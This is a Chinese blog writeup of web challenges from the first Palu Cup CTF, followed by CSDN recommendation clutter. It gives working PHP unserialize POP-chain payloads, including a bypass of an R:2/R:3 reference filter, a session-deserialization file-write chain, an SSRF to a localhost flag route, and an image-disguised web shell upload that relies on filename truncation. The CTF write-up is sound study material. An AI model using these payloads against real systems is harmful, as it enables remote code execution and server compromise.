第一届帕鲁杯ctf一点点题目答案

已于 2024-04-27 22:20:01 修改
阅读量945 收藏 8
点赞数 12
文章标签: web安全
于 2024-04-21 20:11:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hcja666/article/details/138003830
版权

目录标题

web R23

<?php
show_source(__FILE__);
class a{
    public function __get($a){
        $this->b->love();
    }
}

class b{
    public function __destruct(){
        $tmp = $this->c->name;
    }
    public function __wakeup(){
        $this->c = "no!";
        $this->b = $this->a;
    }
}

class xk{
    public function love(){
       system($_GET['a']);
    }
}

if(preg_match('/R:2|R:3/',$_GET['pop'])){
    die("no");
}
unserialize($_GET['pop']);

想了一天半,什么玩意啊,类里面都是没定义属性,后来分析其实可以把它当成已经定义的虽然会警告但是不影响。
分析,这题关键在system($_GET['a']);
pop链反推:xk–>a–>b
按理来说应该传:

O:1:“b”:3:{s:1:“c”;O:1:“a”:1:{s:1:“b”;O:2:“xk”:0:{}}s:1:“b”;R:2;s:1:“a”;r:2;}

然后自己get传一个a就得了,但是有过滤。
说实话,翻遍网上各种文章和博客,都没见过过滤R的,真的是第一次见到。以前只见过过滤O:\d+的,只要在数字前面加个+号即可。tnnd这次在R:后面的数字前加个+号竟然没用,执行不了。
就这样卡了一天,不过期间看了一篇文章:https://blog.frankli.site/2021/04/11/Security/php-src/PHP-Serialize-tips/
虽然看不懂,但是知道了用&引用的话,序列化字符串一定会出现大R,用文章里面的话说:(我听不懂他说的什么意思)

R/r后面的数字指代的是在 同一反序列化过程中
出现过的第n个非键(key)对象

只要我们让R后面不是2或3就行,我去gpt问了一下,有没有方法,这东西还真有。
它的方法是:

class outObject{
public h;
}
class innerObject{
  function __destruct(){
  system($_POST[a]);
}
$a=new outObject;
$b=new innerObject;
$a->h=$b;
echo(serialize($a));

当然不是对这题来说,放到这题,思路就是我们本来要传的是对象b的序列化字符串,但是如果让b成为另一个类的属性,就会改变R后面的值,原理暂时不知道。由于这里只有三个类,我们不能自己给它加一个类啊,这里我想到了php的原生类,可以直接用的那种,gpt说:
stdClass:一个空类,没有定义任何方法或属性。于是得到下面的poc

<?php
show_source(__FILE__);
class a{
	
    public function __get($a){
        $this->b->love();
    }
}
class b{
    public function __destruct(){
		
        $tmp = $this->c->name;
        echo('bye');
		var_dump($this->c);
    }
    public function __wakeup(){
		
        $this->c = "no!";
        $this->b = $this->a;
		//var_dump($this->a);
    }
}

class xk{
    public function love(){
	   echo('hi');
       system($_GET['a']);
    }
}

 $outerObj = new stdClass();
 $p=new a;
 $q=new b;
 $p->b=new xk;
 $q->b=&$q->c;
 $q->a=$p;
 $q->c=$p;
 $out->innerObject[0]=$q;//如果是innerObject=$q;打印出来R后面是3,把它变成数组第一个元素的话R后面就是4
 $str=serialize($out);
 echo($str);

最后:
O:8:“stdClass”:1:{s:11:“innerObject”;a:1:{i:0;O:1:“b”:3:{s:1:“c”;O:1:“a”:1:{s:1:“b”;O:2:“xk”:0:{}}s:1:“b”;R:4;s:1:“a”;r:4;}}}&a=cat flag.php然后看源码即可得flag。
补充:比赛结束后几个小时有大佬说O:1:“b”:3:{s:1:“c”;O:1:“a”:1:{s:1:“b”;O:2:“xk”:0:{}}s:1:“b”;R:02;s:1:“a”;r:2;}就能绕,本地试了一下果然可以,不亏是大佬简单高效,我还是太菜了。

web-签到

from flask import Flask, request, jsonify
import requests
from flag import flag  # 假设从 flag.py 文件中导入了 flag 函数
app = Flask(__name__)

@app.route('/', methods=['GET', 'POST'])
def getinfo():
    url = request.args.get('url')
    if url:
        # 请求url
        response = requests.get(url)
        content = response.text
        print(content)
        if "paluctf" in content:
            return flag
        else:
            return content
    else:
        response = {
            'message': 200,  # 这里是数值,不是字符串
            'data': "Come sign in and get the flag!"
        }
        return jsonify(response)
@app.route('/flag', methods=['GET', 'POST'])
def flag1():
    return "paluctf"

if __name__ == '__main__':
    app.run(debug=True, host="0.0.0.0", port=80)

疑似ssrf,url=http://www.baidu.com进入百度。但是其他协议试过了都不得,尝试访问http://127.0.0.1:3226/flag,因为只有返回的页面有paluctf才能得flag。而
@app.route(‘/flag’, methods=[‘GET’, ‘POST’])
def flag1():
return "paluctf"给了机会。但是牛魔的居然报错。什么鬼,后来试了试http://127.0.0.1/flag不加端口传,竟然得了。后来想了想人家函数都是/flag我还加什么端口呢我去。

宇宙召唤

这题是赛后大佬指点解出来的。
只能传图片,文件头检测
在这里插入图片描述png里面隐藏图片🐎,绕过检测,后缀是php.*png因为电脑文件名不能出现星号,但是后端应该是把文件名当字符串处理,但是放进目录时因为检测到不合法字符就把星号及其后面的字符截断了,从而生成php文件,拿到flag。
补充:后来看了官方wp发现好像是一个函数strtok()截断了星号及其后面的东西。

my love

赛后补做,我自己看不出有什么利用方法,而且条件竞争的环境也没开,根据官方wp,竟然利用的是session反序列化,首先查看session保存目录
在这里插入图片描述

<?php

class a{
    public function __get($a){
        $this->b->love();
    }
}

class b{
    public function __destruct(){
        $tmp = $this->c->name;
    }
    public function __wakeup(){
        $this->c = "no!";
        $this->b = $this->a;
    }
}

class xk{
    public function love(){
        $a = $this->mylove;
    }
    public function __get($a){
        if(preg_match("/\.|\.php/",$this->man)){
            die("文件名不能有.");
        }
        file_put_contents($this->man,base64_decode($this->woman));
    }
}
class end{
    public function love(){
        ($this->func)();
    }
}
$exp=new xk;
$exp->man = "/var/lib/php/session/sess_ccc";
$exp->woman = "YXxzOjM6ImFhYSI7bmFtZXxzOjE0OiJ5b3VyIGFyZSBnb29kISI7";
$ok = new a();
$a = new b();
$a->c = &$a->b;
$ok->b = $exp;
$a->a = $ok;
echo serialize($a);
?>

YXxzOjM6ImFhYSI7bmFtZXxzOjE0OiJ5b3VyIGFyZSBnb29kISI7是
a|s:3:“aaa”;name|s:14:“your are good!”;的base64编码。

//启⽤session
<?php
class a{
}
class b{
}
class xk{
}
class end{
}
$exp = new end;
$exp ->func = 'session_start';
$ok = new a();
$a = new b();
$a->c = &$a->b;
$ok->b = $exp;
$a->a = $ok;
echo serialize($a);

然后再get传test=_SESSION&shell=tac%20flag.php
(session文件名为sess加上PHPSESEID)
具体可以看这个大佬文章:https://lisien11.github.io/2024/04/21/%E5%B8%95%E9%B2%81%E6%9D%AF/index.html

后面我再学习session反序列化。

hcja666
关注
  • 12
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
一个能够使用的幻兽修改器
06-16
一个能够使用的幻兽修改器
第一届 “杯“ writeup
mumuzi的博客
04-22 4661
第一届 "杯" - CTF挑战赛writeup(50道应急响应+5道misc+1cry1web)
[第一届 CTF挑战赛 2024] Crypto/PWN/Reverse
weixin_52640415的博客
04-22 1595
最大不可能K=mp+nq=phi-1 LCG样式a=2,b=0,有限域一元二次多项式求解 HGCD p|q,p&q分解n
2024第一届杯应急响应挑战赛-Writeup
qq_58833765的博客
04-22 2176
直接开始解密发现这是一条付费记录(话不多说直接购买),没办法,只能遍历md5看能不能碰运气,最后发现文件名就是他的md5值的前半段。登录PC02查看到很多非系统用户,除去公司员工用户(中文名),系统用户,判断其余用户可能为恶意用户。通过堡垒机查看webserver会话记录分析,该ip请求繁多,时间段较长,分析可能为攻击ip。直接把附件exe拖到ida分析动态调试,下断点,看验证码,直接把验证改了,基操,ez~通过查看堡垒机会话记录的监控,查看攻击者视角,得出钓鱼文件。
PolarCTF2023冬季个人挑战赛wp含web、misc、crypto_polar冬季赛
m0_60635637的博客
04-08 557
exit();参数sys不能等于xxs,但是经过url编码的sys可以等于xxs,先让浏览器进行转码,%25->%,%78->x,就能实现(emmm,附件的内容其实就是乱码修复后的)
幻兽完美存档1.4.1
02-09
3.全稀有 210 只 4.全图鉴解锁 5.全重要物品 6.全弹药 9999 个 7.全素材 9999 个 8.全食材 9999 个 9.全消耗品 9999 个 10.全传奇设计图 9999 个 11.传奇幻兽球 9999+ 12.古代科技全解锁 13.全传奇武器 ...
幻兽最全合成公式,共10282条,覆盖141个各种合成
01-29
网上的都是一部分,我敢说没有比我的这个更全的,141个种类的无限合成,怎么合成的都有,可能不是完全准确,因为合成有随机性
Qt之小助手成品程序
02-23
保存有一些自己记录的数据
幻兽mod安装指南(自用mod)
02-07
幻兽mod安装指南(自用mod)
红队与蓝队:有何区别?
最新发布
aihua002的博客
06-20 1331
红队是一种网络安全策略,可模拟现实世界中对系统和基础设施的网络攻击。其主动的网络安全方法使其成为一个关键组成部分,因为它可以帮助组织在恶意行为者利用漏洞和弱点之前识别它们。蓝队是一种网络安全方法,侧重于保护组织的系统和基础设施免受网络威胁。与红队不同,它涉及主动监控、检测和应对安全事件和漏洞。它可以帮助增强组织的整体安全态势,并最大限度地减少潜在攻击的影响。紫队是一种网络安全方法,它结合了红队和蓝队,以促进进攻方和防御方之间的协作。
网络安全实战:剖析ThinkPHP 5.1.X反序列化漏洞
weixin_43822401的博客
06-16 590
ThinkPHP作为广泛使用的PHP开发框架,在5.1.X版本中存在一个严重的反序列化漏洞。该漏洞允许攻击者通过构造特定的序列化字符串,实现在服务器上执行任意代码,从而可能导致数据泄露、服务中断等安全事件。
网络安全筑基篇——CSRF、SSRF
weixin_55762309的博客
06-19 1206
CSRF(即跨站请求伪造)是指利用受害者尚未失效的身份认证信息、(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害人的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(转账,改密码等)。
网络安全(补充)
m0_62207482的博客
06-15 629
物理安全威胁一般分为自然安全威胁和人为安全威胁。自然安全威胁包括地震、洪水、火灾、鼠害、雷电;;;;人为安全威胁包括盗窃、爆炸、毁坏、硬件安全 防火墙白名单策略:只允许符合安全规则的包通过防火墙,其他通信包禁止 防火墙名单策略:禁止与安全规则相冲突的包通过防火墙,其他通信包都允许 将入侵检测系统置于防火墙内部,使得很多对网络的攻击首先被防火墙过滤,也就是防火墙是首当其冲的,从而减少了对内部入侵检测系统的干扰,提高入侵检测系统的准确率,但是其检测能力不会变化 通过VPN技术,企业可以在远程用户、分
深信服科技:2023网络安全深度洞察及2024年趋势研判报告
2301_76786857的博客
06-19 266
2023 年,生成式人工智能和各种大模型迅速应用在网络攻击与对抗中,带来了新型攻防场景和安全威胁。漏洞利用链组合攻击实现攻击效果加成,在国家级对抗中频繁使用。勒索团伙广泛利用多个信创系统漏洞,对企业数据安全与财产安全造成了严重威胁。数据泄露问题频频出现,个人信息泄露成为了关注的焦点;同时,境外网络攻击势力不断刺探,APT 攻击技术不断更新。 2023年网络安全呈现出哪些演变趋势?本报告将重点围绕安全漏洞、恶意软件、数据安全和 APT攻击四个领域展开观察,并对 2024 年网络安全需重点关注的方向进行深入思考
网络安全练气篇——OWASP TOP 10
weixin_55762309的博客
06-13 1189
OWASP(开放式Web应用程序安全项目)是一个开放的社区,由非营利组织 OWASP基金会支持的项目。对所有致力于改进应用程序安全的人士开放,旨在提高对应用程序安全性的认识。其最具权威的就是“10项最严重的Web 应用程序安全风险列表” ,总结并更新Web应用程序中最可能、最常见、最危险的十大漏洞,是开发、测试、服务、咨询人员应知应会的知识。最重要的版本应用程序中最严重的十大风险。
Python网络安全项目开发实战,怎么扫描漏洞
一个好知识的传播者
06-19 1426
Python在网络安全项目开发实战中发挥着重要的作用。通过Python编写的漏洞扫描器可以自动化地收集目标信息、进行端口扫描和漏洞检测,并生成详细的扫描报告。然而,网络安全是一个复杂的领域,仅仅依靠Python编写的扫描器是远远不够的。未来,我们可以结合机器学习、大数据等技术来进一步提高漏洞扫描的准确性和效率。同时,也需要不断学习和研究新的漏洞利用方式和防范措施,以应对日益复杂的网络安全威胁。Python网络安全项目开发实战_扫描漏洞_编程案例解析实例详解课程教程.pdf。
揭秘网络安全攻防战
waitaikong_的博客
06-17 581
随着互联网的普及,网络安全成为企业和个人关注的焦点。网络安全不仅关系到个人隐私的保护,还影响到企业的商业机密和国家的主权安全。因此,了解和掌握网络安全攻防战的相关知识,对于构建稳固的网络防御体系至关重要。网络安全攻防战是一场没有硝烟的战争,它要求我们不仅要了解当前的攻防技术,还要预见未来可能出现的新威胁,并提前做好准备。通过不断的学习和实践,我们可以提高自己在这方面的知识和技能,为保护网络安全贡献力量。未来的攻击手段将更加多样化和复杂化,防御策略也需要不断地更新和升级以应对新的挑战。
网络安全和信息安全
waitaikong_的博客
06-12 982
信息安全、网络安全与网络空间安全是当前信息技术领域内的三个重要概念,它们在某些方面有着紧密的联系,同时在不同的语境和应用场景下又有所区别。本次分析旨在深入理解这三个概念的定义、内涵及其相互关系,以便更好地应用于实际工作中。综上所述,信息安全、网络安全和网络空间安全是三个密切相关但又各具特色的概念。信息安全关注的是信息本身的保护,网络安全侧重于网络环境和设施的安全,而网络空间安全则是一个更全面的框架,它不仅包括了信息安全和网络安全的内容,还延伸到了更广泛的社会和法律层面。
幻兽静态HTML
03-02
幻兽是一款基于HTML和CSS开发的静态网页。它是一个以幻兽为主题的网页,展示了幻兽的相关信息和图片。静态HTML意味着该网页没有与后端服务器进行交互,所有的内容都是在页面加载时就已经确定好的,无法进行动态更新。 通常,一个幻兽静态HTML页面会包含以下内容: 1. 标题和导航栏:页面顶部通常包含网页的标题和导航栏,用于导航到其他页面或不同的部分。 2. 幻兽介绍:页面中会包含幻兽的基本信息,如名称、属性、技能等。 3. 图片展示:页面中会展示幻兽的图片,以便用户可以直观地了解它的外观。 4. 特点和能力:页面中可能会介绍幻兽的特点和能力,如攻击力、防御力、速度等。 5. 故事背景:有时候会在页面中加入幻兽的故事背景,以增加趣味性和吸引力。 6. 联系方式:如果有需要,页面底部可能会包含联系方式,以便用户可以与相关人员进行交流。 幻兽静态HTML的开发过程主要包括设计页面结构、编写HTML代码和CSS样式,以及添加所需的图片和内容。开发者可以使用文本编辑器或专业的网页开发工具来创建和编辑静态HTML文件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值